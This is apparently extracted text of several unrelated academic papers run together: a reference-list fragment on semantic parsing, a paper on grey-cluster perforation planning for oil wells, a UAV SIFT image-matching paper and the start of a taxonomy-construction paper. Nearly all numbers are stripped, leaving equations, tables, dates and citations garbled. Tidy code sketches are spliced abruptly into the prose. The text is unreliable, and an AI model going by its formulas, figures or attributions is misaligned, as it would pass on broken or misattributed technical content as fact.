learning syn- chronous grammars for semantic parsing with lambda calculus. in association for computational linguis- tics (acl), pages – . m. yang, n. duan, m. zhou, and h. rim. . joint re- lational embeddings for knowledge-based question an- swering. in empirical methods in natural language processing (emnlp). x. yao and b. van-durme. . information extraction over structured data: question answering with free- base. in association for computational linguistics (acl). w. yih, m. chang, x. he, and j. gao. . semantic parsing via staged query graph generation: question answering with knowledge base. in association for computational linguistics (acl). m. zelle and r. j. mooney. . learning to parse database queries using inductive logic programming. in association for the advancement of artificial intel- ligence (aaai), pages – . l. s. zettlemoyer and m. collins. . learning to map sentences to logical form: structured classifica- tion with probabilistic categorial grammars. in uncer- tainty in artificial intelligence (uai), pages – . l. s. zettlemoyer and m. collins. . online learn- ing of relaxed ccg grammars for parsing to logical form. in empirical methods in natural language pro- cessing and computational natural language learn- ing (emnlp/conll), pages – . y. zhang, b. ahn, s. clark, c. v. wyk, j. r. curran, and l. rimell. . chart pruning for fast lexicalised- grammar parsing. in international conference on computational linguistics (coling). international conference on sensor network and computer engineering (icsnce ) a research of perforation plan-decision based on grey cluster relation xue jijun mechanical engineering college xi’an shiyou university xi’an, , shanxi, p.r.china e-mail: xue_jijun@ .com abstract—perforation completion in oil and gas wells is the most important way of completion engineering, the optimization of perforation completion’s designing is influenced by a variety of factors. in order to get the ideal effect of perforation operation, in this paper, a perforation plan-decision based on grey cluster relation is putted forward. it aims to provide a scientific guidance for the perforation. the simulation experimental results show that new models are effective, which offer one kind of science decision-making foundation for petroleum perforation. keywords-perforating operation; grey cluster relation; perforation plan-decision i. introduction perforated well completion as the most extensive and major method of the well’s completion, the reasonable selection of parameters for the program has great meaning of improving efficiency and reducing costs[ ][ ]. by establishing a quantitative regression model to study the relationship between the parameters of the perforation and the production ratio, this algorithm can also analysis how different factors (perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) act on the production ratio and casing strength coefficient. it provides a reliable theoretical basis for the perforation parameter optimization, and gives different perforation completion optimization schemes [ ]. due to the mutual restriction of different parameters, the current subjective decision-making for perforation program can’t make all the factors to achieve the best at the same time. in order to solve the above problems and reduce the subjective influence of the decision maker, maximize the productivity ratio[ ], a perforation plan-decision based on grey cluster relations proposed[ - ]. ii. 
perforation plan-decision based on grey cluster relation perforation optimization needs to confirm a solution to maximize the production capacity. this solution depends on many factors and the main influencing factors are hole depth, pore size, pore density, phase angle, formation heterogeneity, drilling pollution degree and depth, perforation compaction thickness and degree. all these factors are acting on the decision-making of the solution on the same time. perforation plan-decision based on grey cluster has made the model of perforation parameters and the oil well productivity. gray parameters are clustered in the parameters of the perforation scheme, and the evaluation function is established to design the optimal scheme [ - ]. a. building of model first simulating and calculating the productivity ratio of oil and gas, then making a non-linear regression analysis, according to whether perforation penetration penetrate the drilling zone or not, an equation can be established, it indicates the relationship between perforating parameters and capacity. ) the regression equation when the perforation penetration does not penetrate the drilling zone: international conference on sensor network and computer engineering (icsnce )  pr= . y - . + . + . - . - . + . - . + . - . + . - . - . lg( )+ . - . + . - . - * w w k k r r h h h zr zr w w k k k k x k k k s s m m w zr j j x x w w . *lg( )+ . g( )+ . - . + . - . - . x k l k y y w w w zr zr c c c c y h  ) the regression equation that perforation penetration has penetrated the contaminated zone of drilling:  pr=- . + . - . + . - . . lg(k )+ . zr - . + . - . - . lg(k ) + . lg(k )+ . - . zr zr + . - . - . + . k k k k k k s s m m m j k x x x y y cj w w w c w w y y c c h - . + . + . k - . k zr zr - . + . w w h h h r r w w  the quantitative relationships between parameters (perforation penetration ks, perforation aperture kj, perforation phase xw, perforation compaction degree yc, perforation compaction thickness yh, drilling damage thickness wh, drilling pollution degree wc, shot density km, borehole radius rw, formation permeability kzr) and the oil production ratio pr is the basis for the optimization of perforating parameters. b. perforation program base on grey cluster relation the main factors in the decision-making of the perforation plan are six factors: perforation ratio, perforation phase angle, shot density, perforation penetration, perforation diameter and casing strength decreasing coefficient, which are expressed by attributes x , x , x , x , x , x respectively. initial feature object matrix d is made like this: n n n n n n x x x x x x x x x x x x d x x x x x x x x x x x x                              in the formula, ij x represents j th attribute of the ith scheme; in the j scheme j x represents the productivity ratio, j x is the phase angle, j x is the perforation diameter, j x is the hole depth, j x is the aperture, and j x is the casing strength reduction coefficient. there are n scheme and attributes. as the different dimensions will have an impact on decision-making, so the formula ( ) - ( ) are used to d for normalization. the normalization of attribute data based on the different effects caused by different attributes, the formula ( ) shows the method to normalize production ratio, which called upper limit method. 
inherent properties such perforation phase angle, shot density, perforation penetration, perforation diameter are concluded by extreme conversion method, shown as formula ( ). casing strength decreasing coefficient, as a cost-type attribute, calculated by the lower limit method, shown as formula ( ). j max( ) j j x r x   max( ) min( ) ij ij ij ij x r x x    min( ) j j j x r x   international conference on sensor network and computer engineering (icsnce ) in the formula, ,i j n   , the normalized decision matrix can be calculated: n( ) ij r r  . the grey clustering analysis is used to classify the attributes and the similar factors can be classified and simplified. ) initialize processing: ,      ij ij i r r r i j n  ) calculate the gray absolute correlation degree ik  of any two parameter index data ri and rk sequence ( , ,k i j n    ): n | || . * | | || ( ) . *( )| | | | | | | | | | | n i ij in j n k i kj ij ij k in j i k ik i k i k s r r s s r r r r r s s s s s s                             ) establishing attribute correlative sequence matrix according to the above gray absolute correlation degree:                                      the critical value  r ,  , in pursuit of accuracy the value of r is higher than . , the higher the r value, the more accurate the classification is , and the accurate value of r is determined by actual data, the ri and rk classified as similar attributes; when ij  ≥ r. ) several attributes can be merged by the calculation above, and an attribute can be chosen to instead of other similar attributes. a new feature matrix d’ and new normalization matrix ' , m n( ) ij r r  is established according to the grey clustering analysis, where m is the number of attributes and n is the number of schemes. ) computing information entropy ie and weight i  ( ,i m j n   ): '' '' ' '' ' ln( ) ln(n) n i ij ij j ij ij m ij j e r r r r r               in particular, when '' ij r  , let '' ''ln( ) ij ij r r  . ( ) i i m i i e i m e         and i   , m       , m  . establish an evaluation function zk: ' i , , m k ik i z r i m k n        when the evaluation function value z(rk) is larger, the corresponding scheme is better. the program has the largest value of z(k) is chosen as the final construction program. iii. simulation experiment white xx well in chang-qing oilfield, the reservoir depth of middle layer is . m, the total thickness is . m, the thickness of the perforated zone is . m, the porosity is . %, reservoir drainage radius is m, well-bore radius is . m, the pressure of formation is . mpa, the crude oil saturation pressure is . mpa, drilling pollution depth is . mm, the drilling pollution degree is . . the casing strength is . mpa, reservoir heterogeneity is . ( vertical permeability / horizontal permeability), the water saturation is . %, rock poisson's ratio is . , the inclination is º, the oil viscosity is . mpa.s, the perforation optimization scheme is shown as table . international conference on sensor network and computer engineering (icsnce ) table i. 
perforation table of white xx attributes program productivity ratio perforation phase angle (degree) shot density (holes/m) perforation penetration (mm) perforation diameter (mm) casing strength decreasing coefficient(%) a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . a . . . . the initial feature matrix (x ) ij d  can be constructed from the data in table and the results are shown in table . the feature object matrix ( )ijr r  is established by the above equation ( ) - ( ) and the initial feature matrix d, is shown as table . the index data association matrix is established by the above equations ( ) and ( ): . . . . . . . . . . . . . .                     according to the correlation degree matrix, take the critical value . r , r , r and r can be regarded as same class, then take r represent this class. then the influencing attributes of perforation program are adjusted to: productivity ratio r , perforation phase angle r , shot density r , casing international conference on sensor network and computer engineering (icsnce ) strength decreasing coefficient r . establishing new normalization matrix r’=(rij) × , shown as table . table ii. establish the initial feature matrix d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .   t                                                                          table iii. establishment of feature object matrix r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . .                                                                            table iv. deals with the feature matrix by grey cluster relation r’ ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r .  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .        t                                                                     the attribute weight vectors  =( . , . , . , . ) are calculated according to formulas ( ) and ( ). then the evaluation function z is established according to ( ): z={ . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . }. the optimal scheme is a because the z value of scenario a is the largest. it means under the existing formation conditions, the best perforation program is: perforation bullet syd - , phase angle º, hole density m, wearing depth . mm, aperture . mm. iv. conclusion in this paper, a perforation plan-decision based on grey cluster relation is putted forward. 
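As a concrete illustration of the computational core of the method summarized above, the sketch below implements, in Python with NumPy, the normalization rules, the entropy-based attribute weights, and the evaluation function z as they are reconstructed from the formulas in the text. It is only a sketch: the grey absolute relational degree step that merges near-duplicate attributes before weighting is omitted, and the groupings of benefit-type versus cost-type columns are assumptions that must be set for the data at hand.

```python
import numpy as np

def normalize(D, benefit_cols, cost_cols):
    """Normalize the scheme-by-attribute matrix D (rows: schemes, columns: attributes).

    benefit_cols: columns where larger is better (e.g., productivity ratio),
                  scaled by the upper-limit rule  r = x / max(x).
    cost_cols:    columns where smaller is better (e.g., casing-strength
                  decreasing coefficient), scaled by the lower-limit rule r = min(x) / x.
    All remaining columns use the extreme-value rule r = (x - min) / (max - min).
    """
    R = np.empty(D.shape, dtype=float)
    for j in range(D.shape[1]):
        col = D[:, j].astype(float)
        if j in benefit_cols:
            R[:, j] = col / col.max()
        elif j in cost_cols:
            R[:, j] = col.min() / col
        else:
            rng = col.max() - col.min()
            R[:, j] = (col - col.min()) / rng if rng > 0 else 0.0
    return R

def entropy_weights(R):
    """Information-entropy weights over attributes (columns of the normalized matrix)."""
    P = R / (R.sum(axis=0, keepdims=True) + 1e-12)   # proportion of each scheme per attribute
    P = np.where(P <= 0, 1e-12, P)                   # follows the 0 * ln(0) = 0 convention
    n = R.shape[0]                                   # number of schemes
    e = -(P * np.log(P)).sum(axis=0) / np.log(n)     # entropy of each attribute
    return (1.0 - e) / (1.0 - e).sum()               # higher weight for more discriminative attributes

def evaluate(R, w):
    """Evaluation score z_k = sum_i w_i * r_ik for every scheme; larger is better."""
    return R @ w
```

Given a scheme-by-attribute matrix like the one in the experimental table, one would call, for example, `R = normalize(D, benefit_cols={0}, cost_cols={5})`, then `w = entropy_weights(R)`, and select `evaluate(R, w).argmax()` as the construction scheme; the column indices used here are assumptions tied to an ordering with the productivity ratio first and the casing-strength coefficient last.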
this method can be widely used to predict the productivity of wells under different perforation conditions, determine the perforating efficiency of perforated bombs, and study how different factors (the international conference on sensor network and computer engineering (icsnce ) perforation elasticity, perforation penetration, shot density, perforation diameter, perforation phase angle) impose influence to productivity ratio, and casing strength decreasing coefficient. according to the pending reservoir, it also let the oil production capacity to achieve the higher perforation operating parameters and process of excellent combination. it also saves a lot of manpower, materials and time cost, and provide the theoretical basis for the design of completion perforation construction. references: [ ] deng guang-yong. application of optimized perforation technology in oilfield production[j]. new technology & new products of china, ( ): - . [ ] tian xin-ru. influence of optimization design of perforation scheme on oil and gas well productivity[j]. china petroleum and chemical standard and quality, , ( ): - . [ ] cuan ying, wang li-fan.selection of perforation plan based on mopso and topsis decision making[j]. science technology and engineering, , ( ): - . [ ] wang zhong. the application of fuzzy multiple attribute decision making to optimization of perforated completion[d]. xi’an shiyou university, . [ ] chou j r. kansei clustering using fuzzy and grey relation algorithms[j]. journal of interdisciplinary mathematics, , ( ): - . [ ] gong y c, ren z y, fei d, et al. grey relation-projection pursuit dynamic cluster method for multiattribute decision making assessment with trapezoidal intuitionistic fuzzy numbers[j]. control & decision, . [ ] xiao-jing l i, liu l j. comprehensive quality evaluation of intersections based on grey relation degree clustering[j]. journal of shandong jiaotong university, . [ ] guo san-dang,wang ling-ling,liu si-fen et al.grey cluster analysis base on the biggest relational grades[j]. mathematics in practice and theory, , ( ): - . [ ] li xue-mei; dang yao-guo; wang jun-jie.grey relational clustering model for panel data clustering on indicators and its application[j]. control and decision, , ( ): - . [ ] li xue-mei. grey multivariable modeling and its application[d]. nanjing university of aeronautics and astronautics the graduate school college of information science and technology, . international journal of advanced network, monitoring and controls volume , no. , research and realization on the key technology of motion image matching based on uav yuri shebzukhov department of the international relations belarusian state university of transport, republic of belarus , kirova street, gomel, , republic of belarus e-mail: oms@bsut.by wang yubian* department of railway transportation control belarusian state university of transport , kirova street, gomel, , republic of belarus e-mail: alika_wang@mail.ru abstract—with the development of communication network and computer software and hardware technology, especially the emergence of high-precision and high-resolution image sensors, the photography and measurement technology of aerial image have played an increasingly important role in today's geological survey. the traditional aeronautical measurement is carried out by a large manned aircraft. the collected measurement information has a large capacity and a wide shooting range, which is suitable for large-area operations. 
this type of measurement requires high hardware requirements and is expensive, and it is not suitable for small areas. uav aerial measurement system is used to measure the small areas, uav is in small size, with great flight fluctuation, but the data image collected is not accurate enough. in this paper, the common algorithms of image fast matching are compared to conduct in-depth research on gray-level matching and feature-based matching, and sift feature matching algorithm based on feature matching is proposed to obtain the measurement image as consistent as possible with the actual scene. the main features of the object to be measured can be obtained through the actual surface area image measurement test, which is of practical significance in the practical low-altitude small area surveying and mapping. keywords-uav; moving image; feature detection; image matching; image pre-processing i. introduction uav is named quad-rotor aircraft or quad-rotor uav [ ], it is a four-propeller sky aircraft with cross-shaped propellers. the uav can be used to take aerial photos or record video with an optical camera or miniature video recorder. uav photography measurement system is established on the basis of unmanned aerial vehicle (uav) mobile platform, it is a kind of advanced measurement technology to achieve high spatial resolution remote sensing image data, it is playing the very major role in the geological landform measurement, disaster reduction, disaster prevention, emergency rescue, emergency treatment, post-disaster reconstruction and so on. at present, in the aspect of uav it mainly relies on the image aerial camera to collect the image inland and aboard. the traditional measurement camera is not only expensive, but also needs to carry out film image scanning to obtain the digital image. its shooting quality is low and the measurement takes a long time. with the development of the uav aerial survey technology, storage and transmission technology, using the measurement type camera ccd image acquisition has been widely used, the ccd camera has the advantages of a low price, sensors work stability, high sensitivity, the camera ccd cannot direct measurement, the difference of image distortion correction is bigger, so before shot aircraft must be matching the calibration. doi: . /ijanmc- - javascript:; javascript:; international journal of advanced network, monitoring and controls volume , no. , ii. preprocessing of uav image as the uav photography system is equipped with a non-professional measuring digital camera, the performance of the instrument is unstable and the orientation element is uncertain, so bring out the optical distortion error of aerial image. the camera focal length used in this system is fixed, so the distortion difference is the systematic error, which produces the same image for all the collected images. the inspection of camera can adopt the methods of optical laboratory inspection, laboratory inspection and on-duty inspection. at present, the main test method is laboratory test. the experimental field is composed of some mark points of known space coordinates. in the process of check and correct, the experimental field is photographed by the camera under check, and the internal azimuth elements and other elements affecting the shape of the beam are solved according to the method of single space resection or multi-space resection [ ]. 
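For illustration, the space-resection calibration described above can be approximated with OpenCV's standard calibration routine. The sketch below is an assumption-laden stand-in, not the laboratory procedure used by the cited system: it presumes that lists of known 3-D mark-point coordinates and their measured image positions are already available, and it returns interior-orientation elements and distortion coefficients analogous to those listed in the calibration table that follows.

```python
import numpy as np
import cv2

def calibrate_from_control_points(object_points, image_points, image_size):
    """Estimate interior orientation and lens distortion from a calibration test field.

    object_points: list of (N_i, 3) float32 arrays, the known 3-D mark-point
                   coordinates visible in each photograph of the test field.
    image_points:  list of (N_i, 2) float32 arrays, the corresponding measured
                   image coordinates in each photograph.
    image_size:    (width, height) of the images in pixels.

    Returns the RMS reprojection error, the camera matrix (focal length and
    principal point), and the distortion coefficients (k1, k2, p1, p2, k3 in
    OpenCV's ordering).
    """
    rms, camera_matrix, dist_coeffs, rvecs, tvecs = cv2.calibrateCamera(
        object_points, image_points, image_size, None, None)
    return rms, camera_matrix, dist_coeffs

def undistort(image, camera_matrix, dist_coeffs):
    """Resample the image free of radial and tangential distortion.

    cv2.undistort maps each pixel of the corrected image back into the original
    image and interpolates its grey value there.
    """
    return cv2.undistort(image, camera_matrix, dist_coeffs)
```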
in d experimental campus, the system uses uav digital camera easy calibrate to check and correct the digital camera sonyrx ), table shows the detection results and contents, with the origin of coordinates at the lower left corner of the image. table i. the calibration results of sony rx camera content of check calibration value remark x - . mm the element of camera internal azimuth y - . mm f(focal distance) . k (radial distortion factor) . e- the coefficient of radial distortion k (the factor of radial distortion) - . e- p (the factor of eccentricity distortion) . e- tangential distortion coefficient p (the factor of eccentricity distortion) - . e- image distortion correction -- indirect method. this method uses the coordinates on the corrected image to calculate the image coordinates of the corresponding points on the original image, and combines the gray interpolation method to realize image correction [ ], as shown in figure . figure . image distortion correction schematic diagram javascript:; javascript:; javascript:; javascript:; international journal of advanced network, monitoring and controls volume , no. , after years of research, the calculate the deformation correction models getting thrown the error correction model), the model of error correction is:   : image point coordinates x_ and y_ with image center as the origin: main point coordinates picture.  :coefficient of radial distortion :coefficient of tangential distortion :non-square scaling factor of pixels :the no orthogonal error coefficient of ccd array arrangement. the space resection method is used to calculate the coordinates of the camera in photography, which improves the precision of high external square elements and the precision of geometric calibration [ ]. the precise control of uav attitude is mainly timely adjusted through the acquired signals of the attitude sensor, which generally includes two types: the angle sensor and the angular velocity sensor,the dip sensor is implemented indirectly by an acceleration sensor from three directions, the output signal values represent the current three axial acceleration values, if the uav hovers in the air and stays still when the actual geological aerial measurement is made, then obtained acceleration value can be easily converted to obtain the real dip parameter [ ]. it is impossible for a drone to remain stationary in the air for a long time in practical applications, when there is wind, the uav may deviate from a certain direction when it is disturbed. even if the uav remains in a horizontal direction, the output value of the acceleration sensor will still deviate from the central value, resulting in the misjudgment value given by the control center. to avoid this kind of situation, often need to introduce three axis in the practical measuring angular velocity sensor and ultrasonic range finder, according to the three axis get up the acceleration and angular velocity and the z axis direction real-time highly value the rate of change of the acceleration of x, y axis direction, so as to draw close to actual information of the real angle [ ]. iii. uav image matching in most cases, the uav image mapping method adopts the image matching technology, which recognizes the eponymous point between two images or multiple images through corresponding matching algorithm. 
the common matching methods mainly include the following two categories: one is based on grayscale matching, the other is based on feature matching [ ]. in the actual measurement in this paper, sift feature matching algorithm, which is most commonly used in feature matching mode, is adopted for high-precision matching of massive data. sift matching algorithm adopts the matching based on local feature values of the image [ ]. this algorithm holds invariance for translation, rotation occlusion, etc. therefore, it has strong stability in actual use. the feature matching process is shown in figure . figure . feature matching flow chart international journal of advanced network, monitoring and controls volume , no. , a. pyramid image pyramid image refers to the process of decomposing the original image to obtain a series of sub-images with different resolutions. these images are sorted from small to large according to the resolution, forming a group of overlapping pyramid-like images. the matching point is found in the top image, and the matching position is taken as the predicted position of the next layer. the matching result of this layer is taken as the initial matching position of the next layer, and then the matching is conducted successively. the matching result is used as control to match other feature points [ ]. this process from top to bottom, from coarse to fine, ensures the reliability of image search process. in the pyramid image structure, the image is represented by hierarchical structure. at the top of the pyramid structure, data is stored at the lowest resolution possible, as the number of pyramid layers increases, the resolution of the data decreases successively. at the bottom of the pyramid, the data with the highest resolution can be stored to meet the needs of users [ ]. in this way, different layers and different resolutions are adopted to store and display according to the needs of users, forming a pyramid structure with a higher resolution to a lower one and a smaller data volume to a larger one. this image pyramid structure is a typical hierarchical data structure used for image coding and progressive image transmission [ ]. it is suitable for multi-resolution organization of raster data and image data and is also a lossy compression square of raster data or image data. b. image feature point extraction feature extraction refers to using a computer to present the image information of the same name in the image, which determines the common features in the image [ ]. image feature extraction generally depends on the distribution of gray in the image, and the position shape and size of features are determined through the information. sift feature matching algorithm consists of two parts [ ]. the vector features are extracted from multiple images;sift is used to match feature vectors. scale space representation is an expression based on region. scale space is defined as the product of gaussian convolution kernel and remote sensing image. through the derivation of koendetink and babaud, it is proved that gaussian kernel is the only linear kernel to realize scale transformation)[ ]。  in formula , l(x, y, σ) is the scale space, is the gaussian convolution kernel , is the remote sensing image, x, y, σ are respectively represented by position parameters and scale parameters. the smaller the scale space factor is, the smaller the scale is. 
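As a small illustration of the scale-space function just defined, and of the difference-of-Gaussian stack that the following paragraph builds from it, here is a sketch using OpenCV and NumPy. The base scale, the factor k between adjacent levels, and the number of levels per octave are assumed values rather than the ones used in the cited implementation.

```python
import cv2
import numpy as np

def gaussian_scale_space(image, sigma0=1.6, k=2 ** 0.5, levels=5):
    """One octave of the scale space L(x, y, sigma) = G(x, y, sigma) * I(x, y).

    Each level is the image convolved with a Gaussian kernel whose standard
    deviation grows by the factor k between adjacent levels.
    """
    gray = image if image.ndim == 2 else cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    gray = gray.astype(np.float32)
    sigmas = [sigma0 * (k ** i) for i in range(levels)]
    return [cv2.GaussianBlur(gray, (0, 0), sigmaX=s) for s in sigmas], sigmas

def difference_of_gaussians(scale_space):
    """Adjacent-level differences D(x, y, sigma) = L(x, y, k*sigma) - L(x, y, sigma).

    Local extrema of this stack, across both space and scale, are the SIFT
    keypoint candidates described next.
    """
    return [higher - lower for lower, higher in zip(scale_space[:-1], scale_space[1:])]
```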
 after defining the scale space, the scale space function can be used to build the gaussian pyramid model, the scale proportion between two adjacent layers and the same rank pyramid affect the scale space function defined between two adjacent layers [ ]. the scale between adjacent layers is defined as k, define the scale factor as σ), is the differential gaussian pyramid function. at last, each sample point is compared with the adjacent points in the corresponding positions of the upper and lower scale space around the same scale space. if the detection point is local maximum or minimum, it is a candidate point of the image in this scale [ ]. iv. the experimental test this experiment adopts the uav model for the average inspire v . aerial vehicle four axis, the main parameters international journal of advanced network, monitoring and controls volume , no. , including the maximum altitude of meters, maximum rising speed of m/s, the maximum level flight speed of m/s, maximum pitching angle ° m/s wind power, aircraft cabin image sensor using sony exmor / . )。the image device used in this experiment is cannon d mark ii, the image size is * mm. install visual studio on your laptop and configure open cv for experimental testing, using c++ to achieve sift image feature point extraction, the matching method is two dimensional feature point brute force matcher, set a certain threshold to filter the matching results, using find homography function to set ransac method to eliminate error matching, sift was tested according to the above steps to understand its performance, and the performance was obtained as shown in table . table ii. features matching performance table sift+bfmatch image extraction point / time to generate the descriptor ms match the time ms threshold extraction points filter after mismatched points the experimental results show that the method has a reasonable matching time. after filtering the threshold value and the basic matrix, the points basically cover the key area of the image. the pixel distribution is uniform with the low error. the system can meet the matching requirements, and the matching test image is shown in figure . the accuracy rate of the experimental matching is . %. if the image is improved with light effect, the accuracy can reach . %. therefore, this research method has good anti-interference and high stability, and can be widely used in low-altitude image matching with interference factors. figure . feature matching experiments v. conclusion based on the preprocessing theory of aerial survey images, this paper studies the extraction method of image features and uses visual c++ to realize sift extraction of image feature points. brute force matcher, a two-dimensional feature point matching method, was selected for image region matching, use the find homography function to set the ransac method to eliminate false matches, in this method, the matching accuracy was . %~ . % (according to the scene illumination) through the experiment of the geological and geomorphological images of a certain scene, and relatively satisfactory matching effect was obtained. however, due to the deficiencies of uav itself, it is difficult to compare with professional image processing system. with the further development of communication technology and control technology, uav will have a breakthrough application and development prospect in low-altitude measurement field in the future. reference [ ] song wenping. 
research on integration of low altitude remote sensing system of uav and related questions of image date processing[d].xi’an: chang’an university, . : . [ ] li yifei. research on pid control in quad rotorcraft[j].technology and market, . : . international journal of advanced network, monitoring and controls volume , no. , [ ] wang jianxiong. study of the key technology of low altitude phootogrammetry of unmanned aerial vehicle and the practice of large scale topography formation[d].xi’an: chang’an university, . : . [ ] yu huai, yang wen. a fast feature extraction and matching algorithm for uva[j].journal of electronic &information technology, . : . [ ] d. g. lowe. distinctive image features from scale-invariant key points[j]. international journal of computer vision, , ( ): . [ ] li xiang, wang yongjun, li zhi. inter- triadmisalignment of vector field sensors in attitude and heading reference systems and its calibration[j]. chinese journal of sensors and actuators, . : - [ ] tan xiong, yu xuchu, liujingzheng, huang weijie. object fast tracking based on unmanned aerial vehicle video[c]// proceedings of paciia, ieee presss, : . [ ] wang donghua, yue dawei. design and implementation of large remote sensing image correction test system [j]. computer programming skills & maintenance, . : . [ ] liu yawei. the review of uav target detection and tracking method[j]. aerodynamic missile journal, ,( ): - . [ ] d. g. lowe. distinctive image features from scale-invariant key points[j]. international journal of computer vision. , ( ). [ ] cui zhe. image’s characteristic point extraction and matching based on sift algorithm[d].chengdu: university of electronic science and technology of china. . : - . [ ] lu xiaopan. empirical study on the mapping precision based on uav low-altitude photogrammetry[d].beijing: china university of mining and technology. . : - . javascript:void( ) utilizing temporal information for taxonomy construction luu anh tuan ∗ , siu cheung hui † , see kiong ng # ∗institute for infocomm research, singapore at.luu@i r.a-star.edu.sg †school of computer engineering, nanyang technological university, singapore asschui@ntu.edu.sg #institute of data science, national university of singapore seekiong@nus.edu.sg abstract taxonomies play an important role in many applications by organizing domain knowledge into a hierarchy of ‘is-a’ relations between terms. previous work on automatic construc- tion of taxonomies from text documents ei- ther ignored temporal information or used fixed time periods to discretize the time se- ries of documents. in this paper, we pro- pose a time-aware method to automatically construct and effectively maintain a taxon- omy from a given series of documents pre- clustered for a domain of interest. the method extracts temporal information from the docu- ments and uses a timestamp contribution func- tion to score the temporal relevance of the evidence from source texts when identifying the taxonomic relations for constructing the taxonomy. experimental results show that our proposed method outperforms the state- of-the-art methods by increasing f-measure up to %- %. furthermore, the proposed method can incrementally update the taxon- omy by adding fresh relations from new data and removing outdated relations using an in- formation decay function. it thus avoids re- building the whole taxonomy from scratch for every update and keeps the taxonomy effec- tively up-to-date in order to track the latest in- formation trends in the rapidly evolving do- main. 
introduction the explosion in the amount of unstructured text data gives us the opportunity to explore knowledge in depth, but there are also challenges to recog- nize useful information for our interests. to pro- vide access to information effectively, it is impor- tant to organize unstructured data in a structured and meaningful manner. taxonomies, which serve as backbones for structured knowledge, are use- ful for many nlp applications such as question answering (harabagiu et al., ) and document clustering (fodeh et al., ). however, hand- crafted, well-structured taxonomies such as word- net (miller, ), opencyc (matuszek et al., ) and freebase (bollacker et al., ), which are pub- licly available, can be incomplete for new or special- ized domains. as it is time-consuming and cum- bersome to create a new one manually, methods for automatic domain-specific taxonomy construc- tion from text corpora are highly desirable. previous work on automatic construction of domain-specific taxonomies from text documents assumed that the data sets (that is, the document sets) and the underlying taxonomic relations are static. however, the data sets for certain domains may evolve over time, as new documents are added while older documents are deleted or modified. as such, the taxonomic relations for these potentially fast-changing domains may not remain static but become dynamic over time as new domain terms emerge while some older ones disappear. for ex- ample, in world health organization reports about disease outbreak, the term ‘smallpox’ used to be a hyponym of ‘dangerous disease’, but it has fallen off since . on the other hand, since the term ‘ebola’ has become an emerging hyponym of ‘dan- gerous disease’. as another example, up until , in a collection of us yearly reports of terrorism, the term ‘palestine liberation organization’ used to be a hyponym of ‘terrorist group’, but it is no longer true nowadays. ‘palestine liberation organization’ should now be classified as a ‘national organization’ of palestine. when temporal information in data sets is not captured, the resultant taxonomy may be incom- plete or outdated and misleading. this could be caused by the overwhelming evidence of older pat- terns/contexts compared to emerging, but relatively transactions of the association for computational linguistics, vol. , pp. – , . action editor: bo pang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. small amount of, evidence of newer relations. for example, in the taxonomy of us yearly reports on terrorism, many previous methods could fail to rec- ognize the taxonomic relation between the two terms ‘isis’ and ‘terrorist group’ due to relatively infre- quent mentions of ‘isis’ (which only appears in re- ports from ). meanwhile, ‘palestine liberation organization’ could still be classified as a hyponym of ‘terrorist group’ because of the relatively larger number of mentions in the documents from the ear- lier years. in this paper, we propose a time-aware method for domain-specific taxonomy construction from a time series of text documents for a particular do- main. we incorporate temporal information into the process of identifying taxonomic relations by com- puting evidence scores for the data sources weighted by a timestamp contribution function (efron and golovchinsky, ; li and croft, ) to cap- ture the temporally-varying contributions of evi- dence from various documents at a particular point in time. 
we assume that newer evidence is more im- portant than older evidence. for example, the evi- dence that ‘palestine liberation organization’ was a hyponym of ‘terrorist group’ in is less im- portant now than the evidence that ‘isis’ is a hy- ponym of ‘terrorist group’ in . in the proposed method, we incorporate the timestamp contribution function into the method of tuan et al. ( ) to measure the weights of the evidence for both sta- tistical and linguistic methods. with such built-in time-awareness for taxonomy construction, we en- sure that the constructed taxonomies are up-to-date for the fast-changing domains found in newswire and social media, where users constantly search for updated relations and track information trends. most previous work requires re-running the tax- onomy construction process whenever there are new incoming data. our proposed method enables in- cremental update of the constructed taxonomies to avoid costly reconstructions. we incorporate an information decay function (smucker and clarke, ) to manage outdated relations in the con- structed taxonomy. the decay function measures the extent that the relation is out-of-date over time, and we incorporate it into a time-aware graph-based al- gorithm for taxonomy update. the contributions of our research are summarized as follows: • we propose a time-aware method for taxon- omy construction that extracts and utilizes tem- poral information to measure evidence weights of taxonomic relationships. our method con- structs an up-to-date taxonomy by adding new emerging relations and discarding obsolete and incorrect ones. • we propose an incremental time-aware graph- based algorithm to update an existing taxon- omy, instead of rebuilding a new taxonomy from scratch. related work previous work on taxonomy construction can be roughly divided into two main approaches: statis- tical learning and linguistic pattern matching. sta- tistical learning methods for taxonomy construc- tion include co-occurrence analysis (lawrie and croft, ), hierarchical latent dirichlet alloca- tion (lda) (blei et al., ), clustering (li et al., ), term embedding (tuan et al., ), linguis- tic feature-based semantic distance learning (yu et al., ), and co-occurrence subnetwork mining (wang et al., ). supervised statistical methods (petinot et al., ) rely on hierarchical labels to learn the corresponding terms for each label. the labeled training data, however, are costly to obtain and may not always be available in practice. un- supervised statistical methods (pons-porrata et al., ; li et al., ; wang et al., ) are based on the idea that terms that frequently co-occur may have taxonomic relationships. however, these meth- ods generally achieve low accuracy. linguistic approaches for taxonomy construction rely on lexical-syntactic patterns (hearst, ) (e.g., ‘a such as b’) to capture textual expressions of taxonomic relations, matching them with given documents or web information to identify the rela- tions between a term and its hypernyms (kozareva and hovy, ; navigli et al., ; wu et al., ). these patterns can be manually created (wu et al., ) or automatically identified (navigli et al., ). such linguistic pattern matching meth- ods can generally achieve higher precision than the statistical methods, but they suffer from lower cov- erage. to balance precision and recall, zhu et al. ( ) and tuan et al. 
